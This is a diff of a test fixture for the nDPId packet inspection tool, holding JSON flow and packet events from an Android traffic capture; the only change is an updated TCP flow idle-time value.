00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="} 
00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -221,48 +221,48 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": 
{"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} 
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 